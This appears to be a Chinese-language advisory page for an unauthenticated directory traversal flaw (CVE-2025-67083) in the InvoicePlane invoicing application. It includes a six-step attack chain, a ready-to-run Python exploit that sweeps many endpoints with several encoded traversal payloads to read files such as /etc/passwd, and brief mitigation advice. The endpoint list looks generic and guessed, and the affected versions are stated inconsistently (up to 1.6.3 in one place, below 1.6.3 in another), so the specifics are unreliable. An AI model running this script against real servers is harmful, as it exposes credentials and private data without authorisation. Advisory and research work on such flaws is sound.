CVE-2025-67083 InvoicePlane 目录遍历漏洞

漏洞信息

漏洞编号

CVE-2025-67083

漏洞类型

目录遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

InvoicePlane

漏洞概述

CVE-2025-67083是InvoicePlane 1.6.3及之前版本中的一个目录遍历（Path Traversal）漏洞。该漏洞允许未经身份认证的攻击者通过构造特殊的HTTP请求，利用应用程序对文件路径验证不严的缺陷，读取服务器上的任意文件。由于该漏洞无需认证即可利用，且位于Web应用层，因此具有较高的利用难度低、危害范围广的特点。攻击者可以利用此漏洞读取敏感配置文件、源代码、数据库凭证、用户凭证等敏感信息，进一步可能导致系统完全沦陷。漏洞的严重程度取决于Web服务器的配置和运行权限，攻击者能够读取的文件类型和数量受限于服务器文件系统的访问权限。

技术细节

目录遍历漏洞，又称路径穿越漏洞，发生在应用程序对用户输入的文件路径未进行充分验证和过滤时。InvoicePlane 1.6.3版本中的该漏洞允许攻击者通过在请求参数中插入'../'等目录遍历序列，绕过应用程序的安全限制，访问服务器上webroot目录之外的文件。攻击者通常利用此类漏洞访问系统配置文件（如/etc/passwd、web.config）、应用程序配置文件（包含数据库连接凭证）、日志文件等敏感资源。在某些配置下，攻击者甚至可能通过读取.htaccess、.env等文件获取进一步的利用条件。该漏洞的技术关键在于应用程序未对用户提供的文件路径进行规范化（canonicalization）和边界检查，导致攻击者可以构造恶意路径逃逸出预期目录。防御此类漏洞需要在服务端对所有文件路径参数进行严格校验，禁止路径中出现'..'序列，并确保最终路径在允许的目录范围内。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者确认目标网站使用InvoicePlane应用，并识别版本号<=1.6.3

STEP 2

步骤2: 构造恶意请求

攻击者构造包含目录遍历序列（如../../../../etc/passwd）的HTTP请求，针对可能存在文件读取功能的端点

STEP 3

步骤3: 发送恶意请求

攻击者向目标服务器的易受攻击端点（如/download、/uploads等）发送构造的请求，无需任何认证

STEP 4

步骤4: 验证漏洞

服务器处理请求时未正确验证文件路径，导致攻击者能够读取webroot目录之外的系统文件

STEP 5

步骤5: 敏感信息获取

攻击者利用漏洞读取敏感文件，可能包括配置文件、数据库凭证、用户数据等

STEP 6

步骤6: 权限提升/横向移动

根据获取的凭证和信息，攻击者可能进一步获取数据库访问权限、获取管理后台访问权限或执行远程代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67083 Directory Traversal PoC for InvoicePlane
# Target: InvoicePlane <= 1.6.3
# Vulnerability: Unauthenticated file read via path traversal

import requests
import sys

def test_directory_traversal(target_url, file_path):
    """
    Test for directory traversal vulnerability
    
    Args:
        target_url: Base URL of InvoicePlane installation
        file_path: Path to file to read (e.g., ../../../../etc/passwd)
    
    Returns:
        Content of the file if vulnerable, None otherwise
    """
    # Common vulnerable endpoints in InvoicePlane
    endpoints = [
        '/download?file=',
        '/uploads/',
        '/get_file?filename=',
        '/assets/',
        '/files/',
        '/downloads/',
        '/inv_file/download?file=',
        '/uploads_files/',
        '/get_attachment?file=',
        '/download_invoice?file=',
        '/get_pdf?file=',
        '/download_pdf?id='
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': '*/*'
    }
    
    for endpoint in endpoints:
        try:
            # Try different traversal patterns
            traversal_patterns = [
                file_path,
                f'../../../../{file_path}',
                f'..\..\..\..\{file_path}',
                f'%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{file_path}',
                f'....//....//....//....//{file_path}',
                f'..%252f..%252f..%252f..%252f{file_path}'
            ]
            
            for pattern in traversal_patterns:
                url = target_url.rstrip('/') + endpoint + pattern
                response = requests.get(url, headers=headers, timeout=10, verify=False)
                
                if response.status_code == 200:
                    # Check if response contains file content
                    if any(indicator in response.text for indicator in ['root:', '<?php', '<?xml', '{"', '[', '<!']):
                        print(f"[+] VULNERABLE: {url}")
                        print(f"[+] File content preview:")
                        print(response.text[:500])
                        return response.text
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")
    
    return None

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-67083.py <target_url> <file_path>")
        print("Example: python cve-2025-67083.py http://target.com ../../../../etc/passwd")
        sys.exit(1)
    
    target_url = sys.argv[1]
    file_path = sys.argv[2]
    
    print(f"[*] Testing CVE-2025-67083 on {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    
    result = test_directory_traversal(target_url, file_path)
    
    if result:
        print("\n[+] Exploitation successful!")
    else:
        print("\n[-] Target may not be vulnerable or file not accessible")

if __name__ == "__main__":
    main()

影响范围

InvoicePlane < 1.6.3

防御指南

临时缓解措施

临时缓解措施：1）在Web服务器层面配置URL过滤规则，拦截包含../序列的请求；2）限制应用程序文件读取功能的权限，确保只能访问预定义的目录；3）使用chroot环境隔离Web应用；4）临时关闭非必要的文件读取功能；5）加强网络层访问控制，限制对管理接口的直接访问。建议尽快应用官方发布的安全补丁，升级到修复后的版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67083
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67083
3 Details https://www.cvedetails.com/cve/CVE-2025-67083/
4 VulDB https://vuldb.com/cve/CVE-2025-67083
5 Link https://github.com/InvoicePlane/InvoicePlane
6 Link https://www.helx.io/blog/advisory-invoice-plane/